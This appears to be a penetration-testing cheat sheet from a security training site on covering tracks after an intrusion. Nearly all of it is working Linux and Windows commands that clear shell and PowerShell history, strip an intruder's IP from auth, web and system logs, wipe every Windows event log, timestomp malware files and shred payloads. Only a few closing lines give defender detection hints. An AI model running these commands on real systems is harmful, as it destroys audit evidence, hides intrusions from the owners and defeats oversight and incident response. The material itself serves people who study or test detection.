⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Covering Tracks
ANTI-FORENSICS
# Clear evidence of your presence (used in pentests to test detection)
# NOTE: In a real pentest, always discuss with client before clearing logs
# LINUX — Clear command history
history -c && history -w
export HISTFILE=/dev/null
unset HISTFILE
# Or set before starting:
export HISTSIZE=0
# LINUX — Clear specific log entries
# Auth log (SSH logins):
sed -i '/YOUR_IP/d' /var/log/auth.log
# Web access log:
sed -i '/YOUR_IP/d' /var/log/apache2/access.log
# Syslog:
sed -i '/suspicious_process/d' /var/log/syslog
# LINUX — Timestomping (modify file timestamps)
touch -t 202001010000.00 /tmp/malware.sh # set to Jan 1 2020
touch -r /bin/ls /tmp/malware.sh # copy timestamps from /bin/ls
# LINUX — Shred file (overwrite before delete)
shred -u -z -n 3 /tmp/payload.sh
# -u = delete after overwriting, -n 3 = overwrite 3 times
# WINDOWS — Clear event logs (requires admin)
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Clear all logs:
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# WINDOWS — Clear PowerShell history
Remove-Item (Get-PSReadLineOption).HistorySavePath -Force
Clear-History
# WINDOWS — Timestomping with PowerShell
$file = Get-Item "C:\temp\malware.exe"
$file.CreationTime = "01/01/2020 00:00:00"
$file.LastWriteTime = "01/01/2020 00:00:00"
$file.LastAccessTime = "01/01/2020 00:00:00"
# DETECTION (blue team):
# Gaps in log timestamps = log clearing
# Prefetch files still exist even after log clearing
# Windows Volume Shadow Copies may contain original logs
# Log forwarding to SIEM before clearing = logs preserved